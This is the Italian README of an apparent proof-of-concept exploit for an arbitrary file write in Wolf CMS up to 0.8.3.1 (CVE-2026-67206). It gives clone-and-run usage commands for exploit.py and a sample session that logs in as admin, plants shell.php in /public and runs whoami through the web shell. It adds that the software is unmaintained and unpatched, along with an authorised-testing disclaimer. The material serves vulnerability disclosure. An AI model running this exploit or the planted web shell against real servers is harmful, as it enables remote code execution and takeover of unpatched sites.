
PoC exploit per Wolf CMS <= 0.8.3.1: autentica come Admin, scrive un file PHP arbitrario in /public tramite FileManagerController ed esegue comandi attraverso una web shell.
Questo repository contiene un Proof of Concept (PoC) per l'exploit di CVE-2026-67206
Questo progetto è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati. Non utilizzarlo contro sistemi che non possiedi o per i quali non hai il permesso di effettuare test.
Esiste una vulnerabilità di scrittura arbitraria di file nelle versioni di Wolf CMS fino alla 0.8.3.1. Essa consente a un utente autenticato di scrivere file arbitrari e dannosi nella directory /public della root web tramite le funzioni create_file() e save() di FileManagerController.php. La funzione create_file() di FileManagerController.php non valida le estensioni dei file, consentendo quindi a utenti autenticati di scrivere script PHP dannosi e ottenere privilegi di esecuzione remota di codice.
Un'analisi dettagliata con analisi del codice sorgente e dimostrazione dell'exploit è disponibile sul mio blog Medium.
Tutte le versioni di Wolf CMS fino alla 0.8.3.1 sono interessate. Il repository di Wolf CMS è stato archiviato il 28 agosto 2021 e non è più mantenuto attivamente. Attualmente non esistono patch per questa vulnerabilità.
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K
[*] Accesso con le credenziali fornite...
[+] Accesso riuscito
[*] Creazione di un file denominato shell.php...
[+] Creazione del file riuscita
[*] Tentativo di scrittura del payload in shell.php...
[+] Payload scritto con successo!
[+] La web shell è accessibile con la query string 'cmd' all'indirizzo http://127.0.0.1:8080/public/shell.php
[+] Test dell'output di http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data